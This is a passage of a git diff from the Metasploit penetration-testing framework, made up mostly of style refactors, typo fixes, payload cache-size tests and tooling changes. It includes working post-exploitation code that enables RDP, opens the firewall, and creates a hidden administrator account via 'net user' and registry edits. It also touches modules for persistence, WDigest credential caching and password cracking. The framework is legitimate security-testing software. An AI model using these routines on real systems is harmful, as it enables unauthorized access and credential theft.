) + ) register_options( [ OptString.new('USERNAME', [ false, 'The username of the user to create.' ]), OptString.new('PASSWORD', [ false, 'Password for the user created.' ]), - OptBool.new( 'ENABLE', [ false, 'Enable the RDP Service and Firewall Exception.', true]), - OptBool.new( 'FORWARD', [ false, 'Forward remote port 3389 to local Port.', false]), - OptInt.new( 'LPORT', [ false, 'Local port to forward remote connection.', 3389]) - ]) + OptBool.new('ENABLE', [ false, 'Enable the RDP Service and Firewall Exception.', true]), + OptBool.new('FORWARD', [ false, 'Forward remote port 3389 to local Port.', false]), + OptInt.new('LPORT', [ false, 'Local port to forward remote connection.', 3389]) + ] + ) end def run - if datastore['ENABLE'] or (datastore['USERNAME'] and datastore['PASSWORD']) - cleanup_rc = store_loot("host.windows.cleanup.enable_rdp", "text/plain", session,"" , - "enable_rdp_cleanup.rc", "enable_rdp cleanup resource file") + if datastore['ENABLE'] || (datastore['USERNAME'] && datastore['PASSWORD']) + cleanup_rc = store_loot( + "host.windows.cleanup.enable_rdp", + "text/plain", + session, + "", + "enable_rdp_cleanup.rc", + "enable_rdp cleanup resource file" + ) if datastore['ENABLE'] if is_admin? @@ -46,9 +56,9 @@ class MetasploitModule < Msf::Post print_error("Insufficient privileges, Remote Desktop Service was not modified") end end - if datastore['USERNAME'] and datastore['PASSWORD'] + if datastore['USERNAME'] && datastore['PASSWORD'] if is_admin? - addrdpusr(datastore['USERNAME'], datastore['PASSWORD'],cleanup_rc) + addrdpusr(datastore['USERNAME'], datastore['PASSWORD'], cleanup_rc) else print_error("Insufficient privileges, account was not be created.") end @@ -65,21 +75,20 @@ class MetasploitModule < Msf::Post key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server' value = "fDenyTSConnections" begin - v = registry_getvaldata(key,value) + v = registry_getvaldata(key, value) print_status "Enabling Remote Desktop" if v == 1 print_status "\tRDP is disabled; enabling it ..." - registry_setvaldata(key,value,0,"REG_DWORD") - file_local_write(cleanup_rc,"reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"") + registry_setvaldata(key, value, 0, "REG_DWORD") + file_local_write(cleanup_rc, "reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"") else print_status "\tRDP is already enabled" end - rescue::Exception => e + rescue StandardError => e print_status("The following Error was encountered: #{e.class} #{e}") end end - def enabletssrv(cleanup_rc) service_name = "termservice" srv_info = service_info(service_name) @@ -87,32 +96,27 @@ class MetasploitModule < Msf::Post print_status "Setting Terminal Services service startup mode" if srv_info[:starttype] != START_TYPE_AUTO print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..." - unless (service_change_config(service_name, {:starttype => "START_TYPE_AUTO"}) == Windows::Error::SUCCESS) + unless service_change_config(service_name, starttype: "START_TYPE_AUTO") == Windows::Error::SUCCESS print_error("\tUnable to change start type to Auto") end - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"") - if (service_start(service_name) == Windows::Error::SUCCESS) + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"") + if service_start(service_name) == Windows::Error::SUCCESS print_good("\tRDP Service Started") end - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c sc stop termservice\"") + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c sc stop termservice\"") else print_status "\tTerminal Services service is already set to auto" end - #Enabling Exception on the Firewall + # Enabling Exception on the Firewall print_status "\tOpening port in local firewall if necessary" cmd_exec('netsh', 'firewall set service type = remotedesktop mode = enable', 30) - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"") - rescue::Exception => e + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"") + rescue StandardError => e print_status("The following Error was encountered: #{e.class} #{e}") end end - - - def addrdpusr(username, password,cleanup_rc) - rdu = resolve_sid("S-1-5-32-555")[:name] - admin = resolve_sid("S-1-5-32-544")[:name] - + def addrdpusr(username, password, cleanup_rc) print_status "Setting user account for logon" print_status "\tAdding User: #{username} with Password: #{password}" begin @@ -121,6 +125,19 @@ class MetasploitModule < Msf::Post return end + rdu_sid = resolve_sid("S-1-5-32-555") + admin_sid = resolve_sid("S-1-5-32-544") + + if !rdu_sid[:mapped] || !admin_sid[:mapped] + print_error("\tThe Remote Desktop Users group is not mapped") if !rdu_sid[:mapped] + print_error("\tThe Administrators group is not mapped") if !admin_sid[:mapped] + print_error("\tNot adding user #{username}") + return + end + + rdu = rdu_sid[:name] + admin = admin_sid[:name] + user_added = false addusr_out = cmd_exec("cmd.exe", "/c net user #{username} #{password} /add") @@ -131,16 +148,16 @@ class MetasploitModule < Msf::Post end if user_added - file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"") + file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c net user #{username} /delete\"") print_status "\tAdding User: #{username} to local group '#{rdu}'" - cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add") + cmd_exec("cmd.exe", "/c net localgroup \"#{rdu}\" #{username} /add") print_status "\tHiding user from Windows Login screen" hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList' - registry_setvaldata(hide_user_key,username,0,"REG_DWORD") - file_local_write(cleanup_rc,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}") + registry_setvaldata(hide_user_key, username, 0, "REG_DWORD") + file_local_write(cleanup_rc, "reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}") print_status "\tAdding User: #{username} to local group '#{admin}'" - cmd_exec("cmd.exe","/c net localgroup #{admin} #{username} /add") + cmd_exec("cmd.exe", "/c net localgroup #{admin} #{username} /add") print_status "You can now login with the created user" else print_error("Account could not be created") @@ -149,17 +166,12 @@ class MetasploitModule < Msf::Post print_error("\t#{l.chomp}") end end - rescue ::Exception => e + rescue StandardError => e print_status("The following Error was encountered: #{e.class} #{e}") end end def check_user(user) - output = cmd_exec('cmd.exe', '/c net user') - if output.include?(user) - return true - end - - false + cmd_exec('cmd.exe', '/c net user').include?(user) end end diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb index 4c60ac8ad8..acd23d3410 100644 --- a/modules/post/windows/manage/forward_pageant.rb +++ b/modules/post/windows/manage/forward_pageant.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module forwards SSH agent requests from a local socket to a remote Pageant instance. If a target Windows machine is compromised and is running Pageant, this will allow the attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are - tunnelled through the meterpreter session. This could therefore be used to authenticate + tunneled through the meterpreter session. This could therefore be used to authenticate with a remote host using a private key which is loaded into a remote user's Pageant instance, without ever having knowledge of the private key itself. diff --git a/modules/post/windows/manage/persistence_exe.rb b/modules/post/windows/manage/persistence_exe.rb index 605e5391a8..76ef787818 100644 --- a/modules/post/windows/manage/persistence_exe.rb +++ b/modules/post/windows/manage/persistence_exe.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Windows Manage Persistent EXE Payload Installer', 'Description' => %q( - This Module will upload a executable to a remote host and make it Persistent. + This Module will upload an executable to a remote host and make it Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login, SYSTEM will start on system boot but requires privs. SERVICE will create a new service which will start the payload. Again requires privs. diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 3b112f5d83..3c918bf6f1 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post super( update_info( info, 'Name' => 'Windows Manage Privilege Based Process Migration ', 'Description' => %q{ This module will migrate a Meterpreter session based on session privileges. - It will do everything it can to migrate, including spawing a new User level process. + It will do everything it can to migrate, including spawning a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe. If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights: diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index ac31720386..55793f962c 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to - display.By setting advanced option SETPASS to true, it will reset the users + display. By setting advanced option SETPASS to true, it will reset the users password and then execute the command. ), 'License' => MSF_LICENSE, diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index 4fafdf6d54..84227f6225 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => "Windows Manage Set Shadow Copy Storage Space", 'Description' => %q{ - This module will attempt to change the ammount of space + This module will attempt to change the amount of space for volume shadow copy storage. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. diff --git a/modules/post/windows/manage/wdigest_caching.rb b/modules/post/windows/manage/wdigest_caching.rb index eac3ea9815..85de72a541 100644 --- a/modules/post/windows/manage/wdigest_caching.rb +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. - Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. + Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kostas Lintovois '], diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index b3b7d80850..d40a25a614 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{ This module uses railgun to discover hostnames and IPs on the network. LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers), SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers), - NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browswers), + NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browsers), WINDOWS (all Windows hosts), or UNIX (all Unix hosts). }, 'License' => MSF_LICENSE, diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index c99764869c..fd87fb713e 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Post 'Name' => 'Windows Gather Wireless Profile', 'Description' => %q{ This module extracts saved Wireless LAN profiles. It will also try to decrypt - the network key material. Behaviour is slightly different between OS versions + the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key. }, diff --git a/msfd b/msfd index 10d79794d2..fddd17fe05 100755 --- a/msfd +++ b/msfd @@ -19,8 +19,6 @@ end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] require 'msf/base' diff --git a/msfrpc b/msfrpc index cd6df8cd10..c75a8ff47d 100755 --- a/msfrpc +++ b/msfrpc @@ -17,8 +17,6 @@ end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] require 'rex/parser/arguments' @@ -59,7 +57,6 @@ arguments.parse(ARGV) do |opt, idx, val| end end - unless opts['ServerHost'] $stderr.puts "[-] Error: a server IP must be specified (-a)" $stderr.puts arguments.usage @@ -93,4 +90,3 @@ while(ARGV.shift) end Rex::Ui::Text::IrbShell.new(binding).run - diff --git a/msfrpcd b/msfrpcd index bfb882c3e3..e3c5103c22 100755 --- a/msfrpcd +++ b/msfrpcd @@ -17,8 +17,6 @@ end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] require 'rex/parser/arguments' diff --git a/msfvenom b/msfvenom index 2766360baf..eb7b7f6dbb 100755 --- a/msfvenom +++ b/msfvenom @@ -16,7 +16,6 @@ require 'msf/ui' require 'msf/base' require 'msf/core/payload_generator' - class MsfVenomError < StandardError; end class HelpError < StandardError; end class UsageError < MsfVenomError; end diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index cd4f55922c..69578c7a31 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -548,6 +548,16 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'cmd/unix/bind_perl_ipv6' end + context 'cmd/unix/bind_r' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/cmd/unix/bind_r' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'cmd/unix/bind_r' + end + context 'cmd/unix/bind_ruby' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -748,6 +758,16 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'cmd/unix/reverse_python_ssl' end + context 'cmd/unix/reverse_r' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/cmd/unix/reverse_r' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'cmd/unix/reverse_r' + end + context 'cmd/unix/reverse_ruby' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -1104,6 +1124,48 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'java/shell_reverse_tcp' end + context 'linux/aarch64/shell_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/shell_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/shell_reverse_tcp' + end + + context 'linux/aarch64/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter_reverse_http' + end + + context 'linux/aarch64/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter_reverse_https' + end + + context 'linux/aarch64/shell/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/linux/aarch64/reverse_tcp', + 'stages/linux/aarch64/shell' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/shell/reverse_tcp' + end + + context 'linux/armbe/shell_bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -2867,6 +2929,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_ipv6_tcp' end + context 'windows/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/reverse_named_pipe', + 'stages/windows/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter/reverse_named_pipe' + end + context 'windows/meterpreter/reverse_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3826,6 +3899,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/x64/meterpreter/reverse_https' end + context 'windows/x64/meterpreter/reverse_named_pipe' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/windows/x64/reverse_named_pipe', + 'stages/windows/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'windows/x64/meterpreter/reverse_named_pipe' + end + context 'windows/x64/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -4200,66 +4284,6 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_winhttps' end - context 'linux/aarch64/meterpreter_reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/aarch64/meterpreter_reverse_http' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/aarch64/meterpreter_reverse_http' - end - - context 'linux/aarch64/meterpreter_reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/aarch64/meterpreter_reverse_https' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/aarch64/meterpreter_reverse_https' - end - - context 'linux/armbe/meterpreter_reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armbe/meterpreter_reverse_http' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/armbe/meterpreter_reverse_http' - end - - context 'linux/armbe/meterpreter_reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armbe/meterpreter_reverse_https' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/armbe/meterpreter_reverse_https' - end - - context 'linux/armle/meterpreter_reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armle/meterpreter_reverse_http' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/armle/meterpreter_reverse_http' - end - - context 'linux/armle/meterpreter_reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/armle/meterpreter_reverse_https' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/armle/meterpreter_reverse_https' - end - context 'linux/mips64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -4440,6 +4464,17 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/zarch/meterpreter_reverse_https' end + context 'linux/aarch64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/linux/aarch64/reverse_tcp', + 'stages/linux/aarch64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter/reverse_tcp' + end + context 'linux/aarch64/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -4460,6 +4495,46 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/armbe/meterpreter_reverse_tcp' end + context 'linux/armbe/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_http' + end + + context 'linux/armbe/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_https' + end + + context 'linux/armle/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_http' + end + + context 'linux/armle/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_https' + end + context 'linux/armle/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -4726,4 +4801,23 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/zarch/meterpreter_reverse_tcp' end + context 'r/shell_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/r/shell_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'r/shell_bind_tcp' + end + + context 'r/shell_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/r/shell_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'r/shell_reverse_tcp' + end end diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index 2cf50f9f82..11691c7bd1 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -43,9 +43,10 @@ end class Msftidy # Status codes - OK = 0x00 - WARNINGS = 0x10 - ERRORS = 0x20 + OK = 0 + INFO = 1 + WARNING = 2 + ERROR = 3 # Some compiles regexes REGEX_MSF_EXPLOIT = / \< Msf::Exploit/ @@ -73,7 +74,7 @@ class Msftidy # error. def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{cleanup_text(txt)}" - @status == ERRORS ? @status = ERRORS : @status = WARNINGS + @status += WARNING end # @@ -85,7 +86,7 @@ class Msftidy def error(txt, line=0) line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{cleanup_text(txt)}" - @status = ERRORS + @status += ERROR end # Currently unused, but some day msftidy will fix errors for you. @@ -101,6 +102,7 @@ class Msftidy return if SUPPRESS_INFO_MESSAGES line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" + @status += INFO end ## diff --git a/tools/modules/module_description.rb b/tools/modules/module_description.rb new file mode 100644 index 0000000000..3816bfa8f4 --- /dev/null +++ b/tools/modules/module_description.rb @@ -0,0 +1,84 @@ +#!/usr/bin/env ruby +# +# $Id$ +# +# This script lists each module with its description +# +# $Revision$ +# + +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) +require 'msfenv' + +$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + +require 'rex' +require 'msf/ui' +require 'msf/base' + +sort = 0 +filter= 'All' +filters = ['all','exploit','payload','post','nop','encoder','auxiliary'] + +opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-f" => [ true, "Filter based on Module Type [#{filters.map{|f|f.capitalize}.join(", ")}] (Default = All)."], +) + +opts.parse(ARGV) { |opt, idx, val| + case opt + when "-h" + puts "\nMetasploit Script for Displaying Module Descriptions." + puts "==========================================================" + puts opts.usage + exit + when "-f" + unless filters.include?(val.downcase) + puts "Invalid Filter Supplied: #{val}" + puts "Please use one of these: #{filters.map{|f|f.capitalize}.join(", ")}" + exit + end + puts "Module Filter: #{val}" + filter = val + + end + +} + + +Indent = ' ' + +# Always disable the database (we never need it just to list module +# information). +framework_opts = { 'DisableDatabase' => true } + +# If the user only wants a particular module type, no need to load the others +if filter.downcase != 'all' + framework_opts[:module_types] = [ filter.downcase ] +end + +# Initialize the simplified framework instance. +$framework = Msf::Simple::Framework.create(framework_opts) + + +tbl = Rex::Text::Table.new( + 'Header' => 'Module Descriptions', + 'Indent' => Indent.length, + 'Columns' => [ 'Module', 'Description' ] +) + +$framework.modules.each { |name, mod| + x = mod.new + tbl << [ x.fullname, x.description ] +} + +if sort == 1 + tbl.sort_rows(1) +end + +puts tbl.to_s diff --git a/tools/password/cpassword_decrypt.rb b/tools/password/cpassword_decrypt.rb index ed0fca7d77..335809e925 100755 --- a/tools/password/cpassword_decrypt.rb +++ b/tools/password/cpassword_decrypt.rb @@ -79,7 +79,6 @@ class CPassword end end - # # Shows script usage # @@ -88,7 +87,6 @@ def usage exit end - # # Prints a status message # @@ -96,7 +94,6 @@ def print_status(msg='') $stderr.puts "[*] #{msg}" end - # # Prints an error message # @@ -104,7 +101,6 @@ def print_error(msg='') $stderr.puts "[-] #{msg}" end - # # Prints a good message # @@ -112,7 +108,6 @@ def print_good(msg='') $stderr.puts "[+] #{msg}" end - # # main # diff --git a/tools/password/halflm_second.rb b/tools/password/halflm_second.rb index 5bfa44dfb8..21f312c2ca 100755 --- a/tools/password/halflm_second.rb +++ b/tools/password/halflm_second.rb @@ -39,7 +39,6 @@ $args = Rex::Parser::Arguments.new( "-s" => [ true, "The server challenge (default value 1122334455667788)" ], "-h" => [ false, "Display this help information" ]) - $args.parse(ARGV) { |opt, idx, val| case opt when "-n" @@ -81,8 +80,6 @@ if(pass.length != 7) exit end - - pass = pass.upcase hash = hash.downcase @@ -123,7 +120,6 @@ end end end - puts "[*] Trying four characters (eta: #{etime * cset.length * cset.length * cset.length} seconds)..." 0.upto(cset.length-1) do |c1| 0.upto(cset.length-1) do |c2| diff --git a/tools/password/hmac_sha1_crack.rb b/tools/password/hmac_sha1_crack.rb index 2359f01249..fb1acae806 100755 --- a/tools/password/hmac_sha1_crack.rb +++ b/tools/password/hmac_sha1_crack.rb @@ -2,7 +2,7 @@ # # $Id$ # -# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools +# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools # have issues with binary salt values and extremely large salt values. The primary # goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes. # @@ -29,7 +29,6 @@ def usage exit end - hash_inp = ARGV.shift || usage() word_inp = ARGV.shift || usage() @@ -51,17 +50,16 @@ hash_fd.each_line do |line| $stderr.puts "[-] Invalid hash entry, missing field: #{line}" next end - unless h_salt =~ /^[a-f0-9]+$/i + unless h_salt =~ /^[a-f0-9]+$/i $stderr.puts "[-] Invalid hash entry, salt must be in hex: #{line}" next end hashes << [h_id, [h_salt].pack("H*"), [h_hash].pack("H*") ] end -hash_fd.close - +hash_fd.close stime = Time.now.to_f -count = 0 +count = 0 cracked = 0 word_fd.each_line do |line| @@ -75,10 +73,10 @@ word_fd.each_line do |line| cracked += 1 end count += 1 - + if count % 2500000 == 0 $stderr.puts "[*] Found #{cracked} passwords with #{hashes.length} left (#{(count / (Time.now.to_f - stime)).to_i}/s)" - end + end end hashes.delete_if {|e| e[3] } break if hashes.length == 0 diff --git a/tools/password/lm2ntcrack.rb b/tools/password/lm2ntcrack.rb index 57d9ad0adc..c6be3ada62 100755 --- a/tools/password/lm2ntcrack.rb +++ b/tools/password/lm2ntcrack.rb @@ -70,7 +70,6 @@ $args = Rex::Parser::Arguments.new( "-d" => [ true, "The domain (machine) name (NETLMv2/NETNTLMv2 type only)" ], "-h" => [ false, "Display this help information" ]) - $args.parse(ARGV) { |opt, idx, val| case opt when "-t" @@ -122,7 +121,6 @@ else end end - if type == "HALFLM" or type == "LM" or type == "NTLM" then if srvchal != nil or clichal != nil or user != nil or domain != nil then $stderr.puts "[*] No challenge, user or domain must be provided with this type" @@ -872,5 +870,3 @@ else $stderr.puts "type must be of type : HALFLM/LM/NTLM/HALFNETLMv1/NETLMv1/NETNTLMv1/NETNTLM2_SESSION/NETLMv2/NETNTLMv2" exit end - - diff --git a/tools/password/md5_lookup.rb b/tools/password/md5_lookup.rb index 638cfac425..1f50786dce 100755 --- a/tools/password/md5_lookup.rb +++ b/tools/password/md5_lookup.rb @@ -37,7 +37,6 @@ require 'rex' require 'msf/core' require 'optparse' - # # Basic prints we can't live without # @@ -71,7 +70,6 @@ module Md5LookupUtility # @return [String] The name of the tool attr_accessor :group_name - def initialize self.config_file = Msf::Config.config_file self.group_name = 'MD5Lookup' @@ -93,7 +91,6 @@ module Md5LookupUtility end end - # Saves the waiver so the warning won't show again after ack # # @return [void] @@ -101,7 +98,6 @@ module Md5LookupUtility save_setting('waiver', true) end - # Returns true if we don't have to show the warning again # # @return [Boolean] @@ -109,7 +105,6 @@ module Md5LookupUtility load_setting('waiver') == 'true' ? true : false end - private # Saves a setting to Metasploit's config file @@ -124,7 +119,6 @@ module Md5LookupUtility ini.to_file(self.config_file) end - # Returns the value of a specific setting # # @param key_name [String] The name of the setting @@ -177,7 +171,6 @@ module Md5LookupUtility ) end - # Returns the found cracked MD5 hash # # @param md5_hash [String] The MD5 hash to lookup @@ -192,10 +185,8 @@ module Md5LookupUtility get_json_result(res) end - private - # Parses the cracked result from a JSON input # @param res [Rex::Proto::Http::Response] The Rex HTTP response # @return [String] Found cracked MD5 hash @@ -217,7 +208,6 @@ module Md5LookupUtility end - # This class parses the user-supplied options (inputs) class OptsConsole @@ -275,10 +265,8 @@ module Md5LookupUtility options end - private - # Returns the parsed options from ARGV # # raise [OptionParser::InvalidOption] Invalid option found @@ -317,7 +305,6 @@ module Md5LookupUtility return parser, options 